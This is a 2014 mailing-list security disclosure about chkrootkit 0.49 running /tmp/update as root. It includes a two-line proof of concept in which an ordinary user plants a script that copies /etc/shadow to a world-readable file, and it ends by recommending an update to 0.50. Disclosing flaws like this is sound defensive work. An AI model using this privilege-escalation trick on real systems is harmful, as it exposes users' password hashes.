[Slackbuilds-users] chkrootkit vulnerability
mancha
mancha1 at hush.com
Thu Jun 5 06:27:35 UTC 2014
Hi.
As ironic as it sounds, chkrootkit 0.49 can be turned into a
rootkit.
On systems where /tmp is not mounted noexec, a regular user can
create a
file /tmp/update which chkrootkit will execute with root privileges
each
time it's run.
Here's a simple PoC...as normal user:
$ echo -e '#!/bin/bash\ncat /etc/shadow > /tmp/stolen' > /tmp/update
$ chmod 755 /tmp/update
As root:
# chkrootkit
Now the user has access to the shadow password file (/tmp/stolen).
Solution: Update to chkrootkit 0.50
--mancha
-----------------
PGP: 0x25168EB24F0B22AC
[56B7 100E F4D5 811C 8FEF ADD1 2516 8EB2 4F0B 22AC]
More information about the SlackBuilds-users
mailing list